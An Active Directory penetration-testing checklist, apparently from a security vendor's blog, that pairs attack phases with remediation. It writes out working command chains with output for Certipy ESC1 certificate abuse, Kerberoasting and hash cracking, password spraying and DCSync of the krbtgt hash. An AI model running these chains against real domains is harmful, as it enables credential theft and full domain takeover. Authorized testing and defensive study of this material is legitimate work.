Here is the uncomfortable truth about Active Directory testing: the domain usually falls because of how AD is configured, not because of an unpatched bug. Kerberos, NTLM, ACLs, and certificate templates all behave exactly as Microsoft designed them, and an attacker just walks the legitimate plumbing from a standard user to Domain Admin. Patch Tuesday does nothing about a service account whose password is its own name.
This checklist organizes the engagement by attack phase, with the specific tools (BloodHound, Certipy, impacket, Rubeus) and the real output you would see at each step, then a findings table and the controls that break each path. Use it as a tester's worksheet or a defender's threat model. It pairs directly with our internal network penetration testing guide, which covers getting that first foothold, and the broader enterprise misconfigurations picture.
Active Directory penetration testing is the authorized assessment of an AD environment to find the paths an attacker would use to escalate from a normal user to Domain Admin or compromise the domain controllers outright. It focuses on identity: tickets, hashes, group memberships, ACLs, and the trust relationships that hold a forest together.
Because AD runs on Kerberos and NTLM, most attacks abuse legitimate protocol behavior rather than software bugs, so there is often no CVE. Instead you hunt for accounts with weak passwords and SPNs, excessive delegation, dangerous ACLs, and certificate templates that let any user request a privileged cert. Defenders should read our companion on securing against Active Directory attacks.
The engagement almost always runs as an assumed breach: you start with a single standard domain user, the same position a phished employee gives a real attacker, so budget goes toward finding escalation paths rather than re-proving phishing works. From there the phases are deterministic. Enumeration feeds credential access, that feeds lateral movement, and BloodHound ties it all into a graph naming the shortest route to Tier 0.
Enumeration is the foundation, and BloodHound is the single highest-value tool. Run the collector to pull every user, group, computer, session, ACL, and trust, then query for paths from your account to Tier 0. Alongside the graph, inventory the basics with NetExec and Certipy so you know the password policy before spraying and the certificate authority before attacking it.
$ certipy find -u user@corp.local -p <pass> -dc-ip 10.0.5.10 -vulnerable
[*] Found 14 enabled certificate templates
[!] Vulnerable templates:
Template : CorpWebServer
ESC1 : True <- enrollee supplies subjectAltName
Enrollment Rights : CORP\Domain Users <- any user can enroll
[*] Saved to corp_certipy.jsonThat single ESC1 : True with Domain Users enrollment rights is a straight line to Domain Admin, which we exploit later. Note every service account with a Service Principal Name during enumeration; those are your Kerberoasting targets in the next phase, and read the lockout policy now (nxc smb dc01 -u user -p pass --pass-pol) so you do not freeze accounts when you spray.
Two Kerberos attacks dominate the credential-access phase because they are quiet and effective. Kerberoasting requests a service ticket for any account with an SPN, since that ticket is encrypted with the service account's password hash, then cracks it offline. AS-REP roasting targets accounts with pre-authentication disabled and needs no credentials at all.
$ GetUserSPNs.py corp.local/user:<pass> -dc-ip 10.0.5.10 -request
ServicePrincipalName Name MemberOf
-------------------- ---------- -------------------------
MSSQL/sql01.corp svc_sql SQL Admins
$krb5tgt$23$*svc_sql$CORP.LOCAL$MSSQL...<hash blob>... <- crackable TGS
$ hashcat -m 13100 kerb.txt rockyou.txt -r rules/best64.rule
$krb5tgt$23$*svc_sql*...:Summer2023! <- service account password cracked
Session..........: CrackedThat svc_sql account sits in SQL Admins, so its cracked password is immediate lateral movement. On a Windows foothold the equivalents are Rubeus.exe kerberoast and Rubeus.exe asreproast. Password spraying is the other staple: one weak password against every user, staying under the lockout threshold you read during enumeration (nxc smb dc01 -u users.txt -p 'Spring2026!' --continue-on-success).
ADCS abuse is now one of the fastest privilege-escalation routes, cataloged ESC1 through ESC8 by SpecterOps. ESC1 is a template that lets a low-privilege user enroll and supply an arbitrary Subject Alternative Name, so you request a certificate as the domain administrator and authenticate as them. Certipy automates the whole chain.
$ certipy req -u user@corp.local -p <pass> -ca CORP-CA \
-template CorpWebServer -upn administrator@corp.local
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Saved certificate and private key to 'administrator.pfx' <- a cert that says you are DA
$ certipy auth -pfx administrator.pfx -dc-ip 10.0.5.10
[*] Using principal: administrator@corp.local
[*] Got hash for 'administrator@corp.local': aad3b4...:fc525c9...<NT hash> <- the DA NT hashOn a recent assessment of a manufacturing client, that exact chain took a freshly created standard user to Domain Admin in four commands, faster than their EDR finished its first scan of the host. Beyond ADCS, escalate through ACL abuse (GenericWrite to set an SPN then Kerberoast, WriteDACL to grant yourself DCSync) and unconstrained delegation, all of which BloodHound surfaces directly.
Domain dominance is the endgame: full control of the domain plus the ability to regain it at will. DCSync abuses replication rights to pull every password hash from a domain controller, including the krbtgt hash, without running code on the DC.
$ secretsdump.py -just-dc-user krbtgt corp.local/da_user@10.0.5.10
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
krbtgt:502:aad3b435b51404ee:1a59bd44fe5bca7e...<NT hash>::: <- forge golden tickets with thisWith the krbtgt hash you forge a golden ticket and impersonate anyone, indefinitely. Silver tickets forge service-specific access, and a DSRM or AdminSDHolder backdoor gives quiet long-term persistence. This is exactly why incident response after an AD breach insists on rotating krbtgt twice and rebuilding trust. Because these paths reappear as the directory changes, continuous validation matters; agentic pentesting re-walks these chains as group memberships and templates drift instead of waiting a year.
Remediation maps almost one-to-one onto the attack phases, and a handful of controls collapse most paths. Cut credential theft at the source: enforce SMB signing and disable LLMNR/NBT-NS so relay and poisoning fail, and move every service account to a group Managed Service Account (gMSA) so passwords are 120-plus characters and rotate automatically, which makes Kerberoasting pointless.
Then attack the relationships BloodHound exposed. Adopt a tiering model keeping Tier 0 (Domain Admin, DC) credentials off Tier 1 servers and Tier 2 workstations, deploy LAPS so a dumped local hash stops spreading, and prune dangerous ACLs (GenericAll, WriteDACL, GenericWrite) plus unconstrained delegation. For ADCS, harden the template directly: set CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT off so enrollees cannot supply a SAN, require manager approval for enrollment, and remove client-authentication EKU where it is not needed, which kills ESC1 outright. Finally, monitor for DCSync replication from non-DC hosts and rotate krbtgt twice if compromise is suspected. Pair this with our guide on securing against Active Directory attacks.